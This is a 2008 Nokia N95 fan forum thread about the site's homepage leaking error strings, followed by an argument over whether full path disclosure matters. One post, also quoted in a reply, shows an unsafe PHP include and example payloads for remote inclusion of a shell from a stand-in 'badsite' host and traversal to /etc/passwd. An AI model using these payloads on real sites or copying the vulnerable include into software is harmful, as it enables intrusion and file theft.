Register FAQ Members List Calendar Arcade Search Today's Posts Mark Forums Read


Go Back   Nokia N95Users > General Discussion > Site News

Reply
 
Thread Tools Display Modes
  #1  
Old 07-09-2008, 12:38 PM
Steven_Smith's Avatar
N95 User
Phone: N95-1 RM-159 v21.0.016, 8Gb MicroSD
N-Gage ID: steve_smith1990
 
Join Date: Aug 2007
Location: Reading, ENGLAND
Posts: 448
Thanks: 63
Thanked 125 Times in 58 Posts

Send a message via MSN to Steven_Smith Send a message via Yahoo to Steven_Smith
Exclamation FAO Admin - Your Homepage Is DOWN!!!

Quote:
_COM_SEF_NOREAD <snip> )
_COM_SEF_CHK_PERMS
Found when going to Nokia N95 software, downloads, themes - Home
__________________
I've all the time in the world, but nothing very useful to say.

If you appreciate help from a member, then show it by clicking on the 'Thanks' button!!

Last edited by pseudofinn; 07-10-2008 at 10:02 PM.. Reason: snip, snip
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
The Following 3 Users Say Thank You to Steven_Smith For This Useful Post:
admin (07-12-2008), Mr G (07-09-2008), pseudofinn (07-09-2008)
  #2  
Old 07-09-2008, 01:47 PM
Micky's Avatar
N95 Security
Phone: N95-1 v30 16GB(DNA) N95-2 v30(Vodafone) N95-2 v15(DNA) N81 8GB V11, N96-1 WOM trail, N82 Black V20
N-Gage ID: Mickyfin
 
Join Date: Sep 2007
Location: Finland
Posts: 7,603
Thanks: 2,172
Thanked 1,897 Times in 1,211 Posts

Yep, getting the same here. I guess Brandon will sort it soon.
__________________
Click here for the Official Nokia Software Updater, which Now Supports **VISTA**


To find out your N95's Firmware version, key *#0000# into your phones key pad. The V##.#.### shown is your handsets current Firmware! Please enter these details along with N95 model into your profile. This provided information will help other members help you, should you have any problems, or questions with regards to your N95. Thank you.!


Wanted - Faulty N95 handsets. PM me if you have one you wish to part with.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #3  
Old 07-09-2008, 04:17 PM
admin's Avatar
N95Users Administrator
Phone: N95-3
N-Gage ID: None
 
Join Date: Apr 2007
Location: Michigan
Posts: 226
Thanks: 55
Thanked 132 Times in 53 Posts

Thanks guys, fixed.
__________________
Always listening, never caring......
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #4  
Old 07-09-2008, 09:11 PM
Rapid Dr3am's Avatar
N95 User
Phone: N95-1 v21.0.016 (o2.co.uk)
 
Join Date: Sep 2007
Location: Alegedly I'm up my own arse
Posts: 365
Thanks: 23
Thanked 19 Times in 19 Posts

Yay full path disclosure ftw!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #5  
Old 07-09-2008, 09:27 PM
Steven_Smith's Avatar
N95 User
Phone: N95-1 RM-159 v21.0.016, 8Gb MicroSD
N-Gage ID: steve_smith1990
 
Join Date: Aug 2007
Location: Reading, ENGLAND
Posts: 448
Thanks: 63
Thanked 125 Times in 58 Posts

Send a message via MSN to Steven_Smith Send a message via Yahoo to Steven_Smith
Yeah, but you can not access it without admin rights so doesn't really matter.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #6  
Old 07-10-2008, 09:09 AM
Leong's Avatar
N95 Guru
Phone: N95-1 v30.0.015, 5310 XpressMusic v5.81
N-Gage ID: Zii08
 
Join Date: Mar 2007
Location: Malaysia
Posts: 1,434
Thanks: 120
Thanked 233 Times in 119 Posts

In the photo competition prize thread i was wonderign who was this "Generous Brandon". LOL It's so clear now!
__________________
Protect the environment, save the earth!

Check out my Flickr profile! and why not comment on my photos ;D
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #7  
Old 07-10-2008, 08:43 PM
Rapid Dr3am's Avatar
N95 User
Phone: N95-1 v21.0.016 (o2.co.uk)
 
Join Date: Sep 2007
Location: Alegedly I'm up my own arse
Posts: 365
Thanks: 23
Thanked 19 Times in 19 Posts

You seriously need to figure out what is a security risk and what isn't!

I mean now that a *malicious* user knows the path to the web root they, can look at ways to exploit the application layer (weakest part). If they can get a decent LFI they can access etc/passwd from there.

Full Path Disclosure = Bad

EDIT:

Thought I should clarify this a bit more.

Say there was some code that was poorly written like this:

Code:
include($HTTP_GET_VARS['a']);
Now in that page you could pass something like page.php?a=http://www.badsite.com/shell.txt or you could do index.php?a=../../../etc/passwd, now look at how simply that was done.
If I didn't have the full path disclosure, I wouldn't know how many directories down I need to go. I wouldn't know if it was a Windows/*nix box. Well not quite the OS, most boxes will tell you if you ask. Like this box runs FreeBSD 6.2.

Last edited by Rapid Dr3am; 07-10-2008 at 09:00 PM..
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
The Following User Says Thank You to Rapid Dr3am For This Useful Post:
pseudofinn (07-10-2008)
  #8  
Old 07-11-2008, 12:44 AM
Steven_Smith's Avatar
N95 User
Phone: N95-1 RM-159 v21.0.016, 8Gb MicroSD
N-Gage ID: steve_smith1990
 
Join Date: Aug 2007
Location: Reading, ENGLAND
Posts: 448
Thanks: 63
Thanked 125 Times in 58 Posts

Send a message via MSN to Steven_Smith Send a message via Yahoo to Steven_Smith
Quote:
Originally Posted by Rapid Dr3am View Post
You seriously need to figure out what is a security risk and what isn't!

I mean now that a *malicious* user knows the path to the web root they, can look at ways to exploit the application layer (weakest part). If they can get a decent LFI they can access etc/passwd from there.

Full Path Disclosure = Bad

EDIT:

Thought I should clarify this a bit more.

Say there was some code that was poorly written like this:

Code:
include($HTTP_GET_VARS['a']);
Now in that page you could pass something like page.php?a=http://www.badsite.com/shell.txt or you could do index.php?a=../../../etc/passwd, now look at how simply that was done.
If I didn't have the full path disclosure, I wouldn't know how many directories down I need to go. I wouldn't know if it was a Windows/*nix box. Well not quite the OS, most boxes will tell you if you ask. Like this box runs FreeBSD 6.2.
God I would hate to be you! You must have so many enemies, why would anyone want to hack this forum? We don't hold any good information on our members, well nothing you can't already see.

Also most people have better things to do than find security holes in forums, for example the bloke who found the flaw in the DNS servers using cache poisoning, now that was something worth while.
__________________
I've all the time in the world, but nothing very useful to say.

If you appreciate help from a member, then show it by clicking on the 'Thanks' button!!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #9  
Old 07-11-2008, 06:34 PM
Rapid Dr3am's Avatar
N95 User
Phone: N95-1 v21.0.016 (o2.co.uk)
 
Join Date: Sep 2007
Location: Alegedly I'm up my own arse
Posts: 365
Thanks: 23
Thanked 19 Times in 19 Posts

Did I say someone wanted to hack the forum? Oh wait it's a small forum so the server wouldn't be any use? I doubt someone would use it for Phishing or DDoS attacks. Maybe even just for lulz?

Also it's fora not forums, in the English language when you take a word that end UM like Forum or Agendum the plural becomes A making Agenda or Fora.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #10  
Old 07-12-2008, 01:05 AM
Steven_Smith's Avatar
N95 User
Phone: N95-1 RM-159 v21.0.016, 8Gb MicroSD
N-Gage ID: steve_smith1990
 
Join Date: Aug 2007
Location: Reading, ENGLAND
Posts: 448
Thanks: 63
Thanked 125 Times in 58 Posts

Send a message via MSN to Steven_Smith Send a message via Yahoo to Steven_Smith
No one is sad enough. And I am sure the forum is a lot more secure than you think.
__________________
I've all the time in the world, but nothing very useful to say.

If you appreciate help from a member, then show it by clicking on the 'Thanks' button!!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Sponsored links
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
FAO Admin - Sales forum suggestion Gaz Service Level 2 Site News 16 07-09-2008 10:07 AM
Happy Birthday Admin!!! Mr G The Lounge 17 03-16-2008 05:41 PM
Homepage for N95 phone pdahomepage General 95 14 11-09-2007 05:10 PM


All times are GMT. The time now is 11:15 AM.
Style Developed by Andrew Slane

Powered by vBulletin® Version 3.7.4
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.2.0 Ad Management by RedTyger
Contact Us - Nokia N95 Users Forum - Privacy Statement - Top